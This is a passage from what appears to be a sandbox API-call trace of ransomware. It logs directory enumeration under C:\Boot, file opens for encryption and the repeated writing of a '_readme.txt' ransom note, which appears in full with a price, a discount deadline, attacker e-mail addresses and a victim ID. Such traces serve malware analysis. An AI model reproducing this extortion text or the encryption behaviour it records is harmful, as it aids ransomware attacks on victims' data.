files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.216] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.218] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*" (normalized: "c:\\boot\\fr-fr\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.219] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.219] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.219] PathFindExtensionW (pszPath="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned=".mui" [0188.219] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.221] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.221] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0188.221] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.222] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.244] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0188.244] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.244] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.244] PathFindFileNameW (pszPath="") returned="" [0188.244] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.245] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.245] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.245] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.245] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0188.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.246] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0188.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.246] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.246] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.246] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.247] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*" (normalized: "c:\\boot\\hu-hu\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.248] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, 